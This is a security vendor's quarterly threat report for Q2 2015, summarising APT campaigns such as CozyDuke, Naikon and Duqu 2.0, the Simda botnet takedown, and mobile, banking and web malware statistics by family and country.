- According to KSN data, Kaspersky Lab solutions detected and repelled a total of 379,972,834 malicious attacks from online resources located all over the world.
- Kaspersky Lab’s web antivirus detected 26,084,253 unique malicious objects: scripts, exploits, executable files, etc.
- 65,034,577 unique URLs were recognized as malicious by web antivirus components.
- 51% of web attacks neutralized by Kaspersky Lab products were carried out using malicious web resources located in Russia.
- There were 5,903,377 registered notifications about attempted malware infections aiming at stealing money via online access to bank accounts.
- Kaspersky Lab’s file antivirus detected a total of 110,731,713 unique malicious and potentially unwanted objects.
- Kaspersky Lab mobile security products detected
- 1,048,129 installation packages;
- 291,887 new malicious mobile programs;
- 630 mobile banker Trojans.
Recently we published our analysis of CozyDuke, yet another cyber-espionage APT from the ‘Duke’ family – which also includes MiniDuke, CosmicDuke and OnionDuke. CozyDuke (also known as ‘CozyBear’, ‘CozyCar’ and ‘Office Monkeys’) targets government organisations and businesses in the US, Germany, South Korea and Uzbekistan.
The attack implements a number of sophisticated techniques, including encryption, anti-detection capabilities and a well-developed set of components that are structurally similar to earlier threats within the ‘Duke’ family.
However, one of CozyDuke’s most notable features is its use of social engineering to get an initial foothold in targeted organisations. Some of the attackers’ spear-phishing emails contain a link to hacked web sites – including high-profile, legitimate sites – that host a ZIP archive. This archive contains a RAR SFX that installs the malware while showing an empty PDF as a decoy. Another approach is to send out fake flash videos as email attachments. A notable example (which also gives the malware one of its names) is ‘OfficeMonkeys LOL Video.zip’. When run, this drops a CozyDuke executable on to the computer, while playing a ‘fun’ decoy video showing monkeys working in an office. This encourages victims to pass the video around the office, increasing the number of compromised computers.
It is necessary to make staff education a core component of any business security strategy #KLReportTweet
The successful use of social engineering to trick staff into doing something that jeopardises corporate security – by CozyDuke and many other targeted attackers – underlines the need to make staff education a core component of any business security strategy.Naikon: gathering geo-political intelligence
In May we published our report on the Naikon APT. Naikon is used in campaigns against sensitive targets in South-eastern Asia and around the South China Sea. The attackers seem to be Chinese-speaking and have been active for at least five years, focusing their attention on top-level government agencies and civil and military organizations in countries such as the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, Nepal, Thailand, Laos and China.
As with so many campaigns of this kind, the attackers use spear-phishing emails to trick unsuspecting staff into loading the malware. Emails include an attached file containing information likely to be of interest to the victim. The file seems to be a standard Word document, but it is really an executable with a double extension, or an executable that uses the RTLO (right to left override) mechanism to mask the real extension of the file. If the victim clicks on the file, it installs spyware on the computer while displaying a decoy document to avoid arousing suspicion.
The attackers use spear-phishing emails to trick staff into loading malware #KLReportTweet
Naikon’s main module is a remote administration tool: this module supports 48 commands to exercise control over infected computers. These include commands to take a complete inventory, download and upload data, and install add-on modules. In addition, Naikon sometimes uses keyloggers to obtain employees’ credentials.
Each target country is assigned its own operator, who is able to take advantage of local cultural features – for example, the tendency to use personal email accounts for work. They also made use of a specific proxy server within a country’s borders, to manage connections to infected computers and transfer data to the attackers’ Command-and-Control (C2) servers.
While researching Naikon, we uncovered the activities of the Hellsing APT group. This group focused mainly on government and diplomatic organisations in Asia – most victims are located in Malaysia and the Philippines, although we have also seen victims in India, Indonesia and the US.
In itself, Hellsing is a small and technically unremarkable cyber-espionage group (around 20 organisations have been targeted by Hellsing). What makes it interesting is that the group found itself on the receiving end of a spear-phishing attack by the Naikon APT group – and decided to strike back! The target of the email questioned the authenticity of the email with the sender. They subsequently received a response from the attacker, but didn’t open the attachment. Instead, shortly afterwards they sent an email back to the attackers that contained their own malware. It’s clear that, having detected that they were being targeted, the Hellsing group was intent on identifying the attackers and gathering intelligence on their activities.
Hellsing found itself on under a spear-phishing attack by the Naikon APT group – and struck back #KLReportTweet
In the past, we’ve seen APT groups accidentally treading on each other’s toes – for example, stealing address books from victims and then mass-mailing everyone on each of the lists. But an ATP-on-APT attack is unusual.Grabit and run
Many targeted attack campaigns focus on large enterprises, government agencies and other high-profile organisations. So it’s easy to read the headlines and imagine that such organisations are the only ones on the radar of the attackers. However, one of the campaigns we reported last quarter showed clearly that it’s not only ‘big fish’ that attackers are interested in. Every business is a potential target – for its own assets, or as a way of infiltrating another organisation.
The Grabit cyber-espionage campaign is designed to steal data from small- and medium-sized organisations – mainly based in Thailand, Vietnam and India, although we have also seen victims in the US, UAE, Turkey, Russia, China, Germany and elsewhere. The targeted sectors include chemicals, nanotechnology, education, agriculture, media and construction. We estimate that the group behind the attacks has been able to steal around 10,000 files.
The malware is delivered in the form of a Word document attached to an email. The document contains a malicious macro named ‘AutoOpen’. This macro opens a socket over TCP and sends an HTTP request to a remote server that was hacked by the group to serve as a malware hub. Then the program used to carry out the spying operation is downloaded from this server. In some cases, the macro is password protected (the attackers seem to have forgotten that a DOC file is actually an archive; and when it’s opened in an editor, macro strings are shown in clear-text). The attackers control compromised computers using a commercial spying tool called HawkEye (from HawkEyeProducts). In addition, they use a number of Remote Administration Tools (RATs).
The attackers have implemented some techniques designed to make Grabit hard to analyze,, including variable code sizes, code obfuscation and encryption. On the other hand, they fail to cover their tracks in the system. The result is a ‘weak knight in heavy armor’, suggesting that the attackers didn’t write all the code themselves.The return of Duqu
In spring 2015, during a security sweep, Kaspersky Lab detected a cyber-intrusion affecting several internal systems. The full-scale investigation that followed uncovered the development of a new malware platform from one of the most skilled, mysterious and powerful groups in the APT world – Duqu, sometimes referred to as the step-brother of Stuxnet. We named this new platform ‘Duqu 2.0′.
The malware platform was designed to survive almost exclusively in the memory of infected systems. #KLReportTweet
In the case of Kaspersky Lab, the attack took advantage of a zero-day vulnerability in the Windows kernel (patched by Microsoft on 9 June 2015) and possibly up to two others (now patched) that were also zero-day vulnerabilities at the time. The main goal of the attackers was to spy on Kaspersky Lab technologies, ongoing research and internal processes.
However, Kaspersky Lab was not the only target. Some Duqu 2.0 infections were linked to the P5+1 events related to negotiations with Iran about a nuclear deal. The attackers appear to have launched attacks at the venues for some of these high-level talks. In addition, the group launched a similar attack related to the 70th anniversary event of the liberation of Auschwitz-Birkenau.
One of Duqu 2.0’s most notable features was its lack of persistence, leaving almost no traces in the system. The malware made no changes to the disk or system settings: the malware platform was designed in such a way that it survives almost exclusively in the memory of infected systems. This suggests that he attackers were confident that they could maintain their presence in the system even if an individual victim’s computer was re-booted and the malware was cleared from memory.
In April, Kaspersky Lab was involved in the take-down of the Simda botnet, co-ordinated by the Interpol Global Complex for Innovation. The investigation was started by Microsoft and expanded to other participants, including Trend Micro, the Cyber Defense Institute, officers from the Dutch National High Tech Crime Unit (NHTCU), the FBI, the Police Grand-Ducale Section Nouvelles Technologies in Luxembourg, and the Russian Ministry of the Interior’s Cybercrime Department “K” supported by the INTERPOL National Central Bureau in Moscow.
As a result of the operation, 14 servers in the Netherlands, the US, Luxembourg, Poland and Russia were taken down. Preliminary analysis of some of the sink-holed server logs revealed 190 countries that had been affected by the botnet.
Preliminary analysis revealed 190 countries that had been affected by the Simda botnet. #KLReportTweet
The bots are distributed via a series of infected web sites that re-direct visitors to exploit kits. The bots download and run additional components from their own update servers and are able to modify the hosts file on the infected computer: in this way, once-infected computers can keep sending out HTTP requests to the malicious servers, indicating that they are still vulnerable to re-infection using the same exploit kits.
Although the Simda botnet is relatively large, with an estimated 770,000 infected computers, the authors went to great lengths to try and make it ‘fly under the radar’ of anti-malware systems. The malware is able to detect emulation, security tools and virtual machines; it uses a number of methods to detect research sandbox environments with a view to tricking researchers by consuming all CPU resources or notifying the botnet owner about the external IP address of the research network; and it implements server-side polymorphism.
Simda also de-activates itself after a short time. This is closely related to the purpose of this particular botnet: it’s a delivery mechanism, designed to disseminate potentially unwanted and malicious software. The distributors wanted to guarantee that only their client’s malware would be installed on infected computers.
Kaspersky Lab products currently detect hundreds of thousands of modifications of Simda, together with many different third-party malicious programs distributed using the Simda botnet. You can use our free Simda bot IP scanner to check if your IP has connected to a Simda C2 server in the past.Phishing, but not as we know it
Early in 2014 a serious vulnerability in the OAuth and OpenID protocols was discovered by Wang Jing, a PHD student at the Nanyang Technological University in Singapore. He found what he named the ‘covert redirect’ vulnerability, which could allow an attacker to steal data following authentication (a summary of the problem, including a link to Jing’s blog, can be found on Threatpost).
Recently, we discovered a phishing campaign that takes advantage of the OAuth vulnerability. OAuth lets customers of online services give third parties limited access to their protected resources without sharing their credentials. It is commonly used by applications for social networks – for example, to obtain access to someone’s contact lists or other data.
The Kaspersky Lab customer who reported the attack received an email saying that someone had used their Windows Live ID and asking them to follow a link to the Windows Live site and follow the security requirements outlined there.
Do not allow untrusted applications to access your data #KLReportTweet
On the face of it, it seems like a standard phishing technique – one that would result in the victim being re-directed to a fake site. But in this case, the link led to the legitimate site. The victim’s login credentials aren’t stolen and they are logged in to the legitimate site. However, after authorization, the victim receives a request for a range of permissions from an unknown application. This can include automatic login, access to profile information, contact list and email addresses. If the victims hands over these rights, it offers the cybercriminals access to their personal information – information that they can use to distribute spam, phishing links or for other fraudulent purposes.
We would recommend the following to safeguard your personal data.
- Do not click on links you receive by email or in messages on social networks.
- Do not allow untrusted applications to access your data.
- Before you agree to such requests, carefully read the description of the access rights being requested by an application
- Read reviews and feedback on the application on the Internet.
- Review the rights of currently installed applications and modify the settings if you need to.
The use of CCTV systems by governments and law enforcement agencies for surveilling public places has grown enormously in recent years. Most of us accept them as a reasonable trade-off between privacy and security. However, this rather assumes that the data gathered using this technology will be handled securely and responsibly, to ensure that the benefits aren’t outweighed by any potential dangers.
Many CCTV cameras have a wireless connection to the Internet, enabling police to monitor them remotely. However, this is not necessarily secure: it’s possible for cybercriminals to passively monitor security camera feeds, to inject code into the network – thereby replacing a camera feed with fake footage – or to take systems offline. Two security researchers (Vasilios Hioureas from Kaspersky Lab and Thomas Kinsey from Exigent Systems) recently conducted research into the potential security weaknesses in CCTV systems in one city. You can read Vasilios’s report on our web site).
Aspects of life are being made digital & security should be considered as part of the design stage #KLReportTweet
The researchers started by looking at the surveillance equipment in locations across the city. Unfortunately, there had been no attempt to mask the branding of the cameras, so it was easy to determine the makes and models of the cameras, examine the relevant specs and create their own scale model in the lab. The equipment being used provided effective security controls, but these controls were not being implemented. Data packets passing across the mesh network were not being encrypted, so that an attacker would be able to create their own version of the software and manipulate data travelling across it.
It’s important to note that they did not attempt to hack into the real network, but analyzed the hardware and communication protocols and built a scale model. The network topology of the surveillance camera network is unlike a standard home wireless network. On a home network, all devices connect to the Internet and one another through a router. Any device connected to that router could potentially trick the other devices into thinking it’s the router and monitor or change data by performing a Man-in-the-Middle attack.
The surveillance camera network is more complicated, because of the distances the data needs to travel. The data must travel from any given camera through a series of nodes eventually leading back to a hub (in a real world implementation, this might be a police station). The traffic follows the path of least resistance where each node has the ability to communicate with several others and selects the easiest path back to the hub.
Hioureas and Kinsey built a series of fake nodes that purported to offer a direct line of communication to a simulated police station. Since they knew all the protocols used on the network, they were able to create a Man-in-the-Middle node that seemed to offer the path of least resistance, causing the real nodes to relay their traffic through their malicious node.
One potential use for attackers would be to spoof footage sent to a police station. This could make it appear as if there was an incident in one location, thereby distracting police from a real attack occurring elsewhere in the city.
The researchers reported these issues to the authorities responsible for the city surveillance systems concerned and they are in the process of fixing the security problems. In general, it’s important that WPA encryption, protected by a strong password, is implemented in these networks; that labelling is removed from hardware, to make it harder for would-be attackers to find out how the equipment operates; and that footage is encrypted as it travels through the network.
The wider issue here is that more and more aspects of everyday life are being made digital: if security isn’t considered as part of the design stage, the potential dangers could be far-reaching – and retro-fitting security might not be straightforward. The Securing Smart Cities initiative, supported by Kaspersky Lab, is designed to help those responsible for developing smart cities to do so with cyber-security in mind.Statistics
All the statistics used in this report were obtained using the Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.Mobile threats
Mobile banker Trojans still remain among the top mobile threats. In our Q1 2015 report, we mentioned Trojan-SMS.AndroidOS.OpFake.cc, which could attack at least 29 banking and financial applications. The latest version of this Trojan can now attack 114 banking and financial applications. Its main goal is to steal the user’s online credentials. Serving the same purpose, it also attacks several popular email applications.
Trojan-Spy.AndroidOS.SmsThief.fc also deserves a mention. Cybercriminals managed to add their code into the original banking application without affecting its operation, making this Trojan more difficult to detect.
The latest version of Trojan-SMS.AndroidOS.Opfake.cc can now attack 114 banking and financial applications. #KLReportTweet
A new iOS Trojan, Trojan.IphoneOS.FakeTimer.a, emerged in Q2. It is interesting in that it is an iOS version of a malicious Android app which emerged several years ago. FakeTimer.a attacks even non-jailbroken devices. Its payload is rather primitive: it is a regular phishing application created to steal money from Japanese users.
In Q2, Trojans which can use root privileges to display advertisements to users or install advertising applications became especially visible. A total of six such malicious programs landed in the Q2 TOP 20 of malicious malware.The number of new mobile threats
In Q2 2015, Kaspersky Lab mobile security products detected 291,887 new malicious mobile programs, a 2.8-fold increase on Q1 2015.
Kaspersky Lab mobile security products detected 291,887 new malicious mobile programs #KLReportTweet
The number of installation packages detected was 1,048,129 – this is seven times as many as in the previous quarter.
Number of malicious installation packages and new malicious mobile programs detected (Q4 2014 – Q2 2015)Distribution of mobile malware by type
Distribution of new mobile malware by type, Q2 2015
The ranking of malware objects for mobile devices for the second quarter of 2015 was headed by RiskTool (44.6%). These are legitimate applications that are potentially dangerous for users – if used carelessly or manipulated by a cybercriminal, they could lead to financial losses.
Potentially unwanted advertising apps came second with 19%.
SMS Trojans have previously led this ranking, but in Q2 they were only in the fourth place with 8.1% – this is 12.9% lower than in Q1. The lower share taken by these malicious programs is in part accounted for by the fact that those who were previously active distributing SMS Trojans have started using ‘cleaner’ monetization techniques (as testified by the increased RiskTool shares), or prefer to use other types of malware. Thus the Trojan share increased from 9.8% in Q1 to 12.4% in Q2.Top 20 malicious mobile programs
Please note that, starting from this quarterly report, we are publishing the ranking of malicious programs, which does not include potentially dangerous or unwanted programs such as RiskTool or adware.Name % of attacks * 1 DangerousObject.Multi.Generic 17.5% 2 Trojan-SMS.AndroidOS.Podec.a 9.7% 3 Trojan-SMS.AndroidOS.Opfake.a 8.0% 4 Backdoor.AndroidOS.Obad.f 7.3% 5 Trojan-Downloader.AndroidOS.Leech.a 7.2% 6 Exploit.AndroidOS.Lotoor.be 5.7% 7 Trojan-Spy.AndroidOS.Agent.el 5.5% 8 Trojan.AndroidOS.Ztorg.a 3.1% 9 Trojan.AndroidOS.Rootnik.a 3.0% 10 Trojan-Dropper.AndroidOS.Gorpo.a 2.9% 11 Trojan.AndroidOS.Fadeb.a 2.7% 12 Trojan-SMS.AndroidOS.Gudex.e 2.5% 13 Trojan-SMS.AndroidOS.Stealer.a 2.5% 14 Exploit.AndroidOS.Lotoor.a 2.1% 15 Trojan-SMS.AndroidOS.Opfake.bo 1.6% 16 Trojan.AndroidOS.Ztorg.b 1.6% 17 Trojan.AndroidOS.Mobtes.b 1.6% 18 Trojan-SMS.AndroidOS.FakeInst.fz 1.6% 19 Trojan.AndroidOS.Ztorg.pac 1.5% 20 Trojan-SMS.AndroidOS.FakeInst.hb 1.4%
* Percentage of users attacked by the malware in question, relative to all users attacked
The top position in the rankings was occupied by DangerousObject.Multi.Generic (17.5%). This is how new malicious applications are detected by the KSN cloud technologies, which help our products to significantly shorten the response time to new and unknown threats.
Trojan-SMS.AndroidOS.Podec.a (9.7%) has been among the Top Three malicious mobile programs for three quarters in a row due to its active dissemination.
Trojan-SMS.AndroidOS.Opfake.a (8.0%) has been quickly rising to the top lines of the ranking. While in Q3 2014 it was in the 11th place only,it is now in the TOP 3 of mobile malware. Obfake.bo, another representative of this malware family, is in 15th place.
It is also worth mentioning the appearance of Backdoor.AndroidOS.Obad in the TOP 20 ranking – in fact, it jumped to fourth place all at once. This is a multi-functional Trojan, capable of sending SMS to premium-rate numbers; downloading other malware programs, installing them on the infected device and/or sending them further via Bluetooth; and remotely performing commands in the console. We wrote about it two years ago, and its capabilities have remained virtually unchanged ever since.
Another interesting thing is that although this ranking does not include adware programs, six of the TOP 20 malicious mobile programs use advertisements as the main vehicle of monetization. Unlike regular advertisement modules, Trojan.AndroidOS.Rootnik.a, three programs of the Trojan.AndroidOS.Ztorg family, Trojan-Downloader.AndroidOS.Leech.a and Trojan.AndroidOS.Fadeb.a do not carry any productive payload with them. Their goal is to deliver to the user as much advertising as possible in various ways, including installation of new adware programs. These Trojans can use root privileges to conceal themselves in the system folder – this makes it very difficult to delete them.Mobile banker Trojans
In Q2 2015, we detected 630 mobile banker Trojans. It should be noted that the number of new malware programs belonging to this category is now growing at a much slower rate.
Number of mobile banker Trojans detected by Kaspersky Lab’s solutions (Q3 2014 – Q2 2015)
Geography of mobile banking threats in Q2 2015
(number of users attacked)
The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we made a country ranking according to the percentage of users attacked by mobile banker Trojans.
Top 10 counties attacked by mobile banker Trojans (ranked by percentage of users attacked):Country* % of users attacked by mobile bankers** 1 Republic of Korea 2.37% 2 Russia 0.87% 3 Uzbekistan 0.36% 4 Belarus 0.30% 5 Ukraine 0.29% 6 China 0.25% 7 Kazakhstan 0.17% 8 Australia 0.14% 9 Sweden 0.13% 10 Austria 0.12%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country
Mobile bankers proliferate most actively in Korea. Cybercriminals are also historically active in Russia and other post-Soviet countries. It is some of these countries that occupy four out of five positions in the ranking.
An indication of how popular mobile banker Trojans are with cybercriminals in each country, may be provided by the percentage of users who were attacked at least once by mobile banker Trojans during the reported three month period, relative to all users in the same country whose mobile security product was activated at least once in the reporting period. This ranking is different from the one above:
TOP 10 countries by the percentage of users attacked by mobile bankers relative to all attacked usersCountry * % of users attacked by mobile bankers, relative to all attacked users * 1 Republic of Korea 31.72% 2 Russia 10.35% 3 Australia 6.62% 4 Austria 6.03% 5 Japan 4.73% 6 Uzbekistan 4.17% 7 Belarus 3.72% 8 Ecuador 3.50% 9 Ukraine 3.46% 10 Switzerland 3.09%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all unique users attacked by mobile malware in the country
In Korea, almost one third of all users attacked by mobile malware were attacked by mobile bankers in particular. In Russia, every tenth attacked user came under a mobile banker attack. In other countries, this percentage is lower. Interestingly, there are four countries in this TOP 10 which are also in the TOP 5 of most secure counties with the lowest probability of mobile malware infection – these are Australia, Austria, Japan and Switzerland.The geography of mobile threats
The geography of mobile malware infection attempts in Q2 2015
(percentage of all users attacked)
Top 10 countries attacked by mobile malware:Country* % of users attacked** 1 China 16.34% 2 Malaysia 12.65% 3 Nigeria 11.48% 4 Bangladesh 10.89% 5 Tanzania 9.66% 6 Algeria 9.33% 7 Uzbekistan 8.56% 8 Russia 8.51% 9 Ukraine 8.39% 10 Belarus 8.05%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country
This ranking is led by China, where 16.34% of all users of Kaspersky Lab’s product were attacked at least once during the three month period. Malaysia is in second place with 12.65%. Russia (8.51%), Ukraine (8.39%) and Belarus (8.05%) close the TOP 10 ranking, below some Asian and African countries.
Korea took 11th place in this ranking with 7.46%. Let us remind the reader that mobile banker Trojans are very popular with the Korean cybercriminals: 31.72% of all users attacked by mobile malware were the victim of a mobile banking Trojan attack.
The most secure countries in this respect are:Country % of users attacked 1 Japan 1.06% 2 Canada 1.82% 3 Austria 1.96% 4 Australia 2.16% 5 Switzerland 2.19% Vulnerable applications used by fraudsters
The ranking of vulnerable applications below is based on information about the exploits blocked by our products. These exploits were used by cybercriminals in Internet attacks and in attempts to compromise local applications, including those installed on mobile devices.
Distribution of exploits used in attacks by type of application attacked, Q2 2015
The rating of exploits has seen little change from the first quarter. The Browsers category (60%) maintained its top position in the Q2 2015. Currently most exploit packs contain a pack of exploits for Adobe Flash Player and Internet Explorer. It is worth mentioning the growing number of exploits for Adobe Flash Player (up by six percentage points) which is caused by the large number of spam mass mailings containing malicious PDF documents.
The number of exploits for Java continues to decrease (down four percentage points): in Q2 we did not see any new exploits for Java.
In the second quarter of 2015 we registered the use of four new vulnerabilities in Adobe Flash Player:
Although the share of exploits for Adobe Flash Player in our rating is only 3%, there are many more of them in the “wild”. When considering these statistics, we should take into account that Kaspersky Lab technologies detect exploits at various stages. The Browsers category also includes detection of landing pages that “distribute” exploits. According to our observations, they are most often exploits for Adobe Flash PlayerOnline threats (Web-based attacks)
The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.Online threats in the banking sector
In the second quarter of 2015, Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on the computers of 755,642 users. This figure represents an 18.7% decrease compared to the previous quarter (735,428).
There were 5,903,377 registered notifications about attempted financial malware infections #KLReportTweet
A total of 5,903,377 notifications of malicious activity by programs designed to steal money via online access to bank accounts were registered by Kaspersky Lab security solutions in Q2 2015.
Number of computers attacked by financial malware, Q2 2015Geography of attacks
In the second quarter of 2015, we changed the methodology used to create the rating of countries affected by the malicious activity of banking Trojans. In our previous reports, the Top 10 was made using the number of users attacked. Although this aspect is very important, it depends on the number Kaspersky Lab product users in the countries.
To evaluate and compare the degree of risk of being infected by banking Trojans which user computers are exposed to worldwide, we calculate the percentage of Kaspersky Lab product users who encountered this threat during the reporting period in the country, of all users of our products in this county.
Geography of banking malware attacks in Q2 2015 (the percentage of users attacked)
Top 10 countries by the percentage of users attackedCountry* % of users attacked ** 1 Singapore 5.28% 2 Switzerland 4.16% 3 Brazil 4.07% 4 Australia 3.95% 5 Hong Kong 3.66% 6 Turkey 3.64% 7 New Zealand 3.28% 8 South Africa 3.13% 9 Lebanon 3.10% 10 UAE 3.04%
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000)
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country
In Q2 2015, Singapore took the lead in the percentage of Kaspersky Lab users attacked by banking Trojans. Noticeably, most countries in the TOP 10 have a high level of technological and banking system development, which draws the attention of cybercriminals.
In Russia, 0.75% users encountered banking Trojans at least once during the quarter, in the US – 0.89%, in Spain – 2.02%, in the UK – 1.58%, in Italy – 1.57% , in Germany – 1.16%.The TOP 10 banking malware families
The table below shows the Top 10 malicious programs most commonly used in Q2 of 2015 to attack online banking users, based on the number of users attacked:Name Number of notifications Number of users attacked 1 Trojan-Downloader.Win32.Upatre 3888061 419940 2 Trojan-Spy.Win32.Zbot 889737 177665 3 Trojan-Banker.Win32.ChePro 264534 68467 4 Backdoor.Win32.Caphaw 72128 25923 5 Trojan-Banker.Win32.Banbra 56755 24964 6 Trojan.Win32.Tinba 175729 22942 7 Trojan-Banker.AndroidOS.Marcher 60819 19782 8 Trojan-Banker.AndroidOS.Faketoken 43848 13446 9 Trojan-Banker.Win32.Banker 23225 9209 10 Trojan-Banker.Win32.Agent 28658 8713
The majority of the Top 10 malicious programs work by injecting random HTML code in the web page displayed by the browser and intercepting any payment data entered by the user in the original or inserted web forms.
The Top 3 banking malicious programs remain unchanged from the previous quarter. Trojan-Downloader.Win32.Upatre kept its leading position in the rating. Malicious programs in this family are relatively simple and no larger than 3.5 KB. They usually download a Trojan-Banker belonging to a family known as Dyre/Dyzap/Dyreza. The list of financial institutions attacked by the banker Trojan depends on the configuration file that is downloaded from the Command-and-Control center.
In Q2 2015, the new banking Trojans entered the rating – Backdoor.Win32.Caphaw, Trojan-Banker.AndroidOS.Marcher and Trojan-Banker.AndroidOS.Faketoken.
Backdoor.Win32.Caphaw was first detected in 2011. It utilizes the Man-in-the-Browser technique to steal online banking credentials of the customers.
Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Marcher attack Android-based mobile devices. Faketoken works in partnership with computer Trojans. To distribute this malware, cybercriminals use social engineering techniques. When a user visits his online banking account, the Trojan modifies the page, asking him to download an Android application which is allegedly required to securely confirm the transaction. In fact the link leads to the Faketoken application.
Once Faketoken is on the user’s smartphone, the cybercriminals gain access to the user’s banking account via the computer infected with a banking Trojan and the compromised mobile device allows them to intercept the one-time confirmation code (mTAN). The second mobile Trojan is Trojan-Banker.AndroidOS.Marcher. After infecting a device, the malware tracks the launch of just two apps – the mobile banking customer of one of the European banks and Google Play. If the user starts Google Play, Marcher displays a false window requesting credit card data which then go to the fraudsters. The same method is used by the Trojan if the user starts the banking application.Financial threats
Financial threats are not limited to banker malware that attacks online banking customers.
Financial malware: distribution by malware type
In Q2 2015, the proportion of banking malware increased from 71% to 83% compared with the previous quarter. The second most widespread financial threat was Bitcoin miners – malicious software that uses computing resources of the victim’s computer to generate bitcoins. In the previous quarter, this category of malware was in third place. Of note is the fact that some legitimate software developers secretly integrate Bitcoin-miners in their applications.Top 20 malicious objects detected online
In the second quarter of 2015, Kaspersky Lab’s web antivirus detected 26,084,253 unique malicious objects: scripts, exploits, executable files, etc.
Kaspersky Lab detected and repelled a total of 379,972,834 malicious attacks from online resources #KLReportTweet
We identified the 20 most active malicious objects involved in online attacks against users’ computers. These 20 accounted for 96.5% of all attacks on the Internet.
Top 20 malicious objects detected onlineName* % of all attacks** 1 AdWare.JS.Agent.bg 47.66% 2 Malicious URL 32.11% 3 Trojan.Script.Generic 4.34% 4 AdWare.Script.Generic 4.12% 5 Trojan.Script.Iframer 3.99% 6 AdWare.JS.Agent.bt 0.74% 7 Exploit.Script.Blocker 0.56% 8 Trojan.Win32.Generic 0.49% 9 AdWare.AndroidOS.Xynyin.a 0.49% 10 Trojan-Downloader.Win32.Generic 0.37% 11 Trojan-Ransom.JS.Blocker.a 0.34% 12 Trojan-Clicker.JS.Agent.pq 0.23% 13 AdWare.JS.Agent.an 0.20% 14 AdWare.JS.Agent.by 0.19% 15 Trojan.Win32.Invader 0.12% 16 Trojan-Downloader.Win32.Genome.qhcr 0.11% 17 AdWare.Win32.Amonetize.ague 0.11% 18 AdWare.Win32.MultiPlug.nnnn 0.10% 19 AdWare.NSIS.Agent.cv 0.09% 20 Trojan-Downloader.Script.Generic 0.09%
* These statistics represent the detection verdicts of the web antivirus module. Information was provided by users of Kaspersky Lab products who consented to share their local statistical data.
** The percentage of all web attacks recorded on the computers of unique users.
The Top 20 is largely made up of verdicts assigned to objects used in drive-by attacks, as well as adware programs.
Aggressive distribution of advertising programs affected the rating: 10 out of 20 positions were occupied by advert-related objects. In first place is the script AdWare.JS.Agent.bg which is implemented by inserting adware in arbitrary web pages. It could even push down Malicious URL, the verdict we use for the links from the black list which are ranked second in Q2 2015.
Of interest is the appearance of the AdWare.AndroidOS.Xynyin.a verdict – it’s unusual to see a verdict for Android malware in the rankings for malware on users’ computers. The program corresponding to this verdict is an advertising module for Android which is embedded in different applications (for example, in programs “accelerating” the work of the phone). One such application was popular in March and April of this year when it was actively downloaded by users. Since Google Play does not provide such applications these applications were downloaded from the Internet mostly via the victims’ computers.
The Trojan-Ransom.JS.Blocker.a verdict is a script which tries to block the browser using a periodic page update and displays the message asking the victim to pay a “fine” to the specified e-wallet for viewing inappropriate material. The script is mostly encountered on porn sites.Top 10 countries where online resources are seeded with malware
The following stats are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.
In order to determine the geographical source of web-based attacks, domain names are matched up against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.
In Q2 2015, Kaspersky Lab solutions blocked 379,972,834 attacks launched from web resources located in various countries around the world. 89% of notifications on blocked web attacks were triggered by attacks coming from web resources located in 10 countries.
Distribution of web attack sources by country, Q2 2015
Russia (51%) maintained its leadership: this country’s share increased by 11.27%. Switzerland left the Top 10. Singapore came eighth in the ranking with 1.56% of all web attacks.Countries where users faced the greatest risk of online infection
In order to assess the risk of online infection faced by users in different countries, we calculate the percentage of Kaspersky Lab users in each country who encounter detection verdicts on their machines during the quarter. The resulting data provide an indication of the aggressiveness of the environment in which computers work in different countries.Country* % unique users attacked** 1 Russia 38.98% 2 Kazakhstan 37.70% 3 Ukraine 35.75% 4 Syria 34.36% 5 Belarus 33.02% 6 Azerbaijan 32.16% 7 Thailand 31.56% 8 Georgia 31.44% 9 Moldova 31.09% 10 Vietnam 30.83% 11 Armenia 30.19% 12 Kyrgyzstan 29.32% 13 Croatia 29.16% 14 Algeria 28.85% 15 Qatar 28.47% 16 China 27.70% 17 Mongolia 27.27% 18 Makedonia 26.67% 19 Bosnia and Herzegovina 25.86% 20 Greece 25.78%
These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.
In Q2 2015, Russia, which was second in the first quarter, regained its top position in the ranking. Since the previous quarter, UAE, Latvia, Tajikistan, Tunisia and Bulgaria have left the Top 20. The newcomers to the rankings were Syria, which rocketed to fourth place (34.36%); Thailand, which was in seventh place (31.56%); Vietnam, in tenth place (30.83%); China (27.70%) and Macedonia (26.67%), which occupied 16th and 18th places respectively.
23.9% of computers connected to the Internet globally were subjected to at least 1 web attack in Q2 #KLReportTweet
The countries with the safest online surfing environments included Argentina (13.2%), the Netherlands (12.5%), Korea (12.4%), Sweden (11.8%), Paraguay (10.2%) and Denmark (10.1%).
On average, 23.9% of computers connected to the Internet globally were subjected to at least one web attack during the three months.Local threats
Local infection statistics for users computers are a very important indicator: they reflect threats that have penetrated computer systems using means other than the Internet, email, or network ports.
